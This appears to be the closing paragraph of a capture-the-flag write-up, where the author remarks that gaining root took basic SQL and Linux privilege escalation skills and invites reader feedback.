This was hard compared to the first two and took me a while to get root access. It took some basic SQL knowledge as well as some basic Linux privilege escalation techniques, but I got it done. If you have any feedback you want to give, leave a comment below. Well, it just gets harder from here. On to the next one!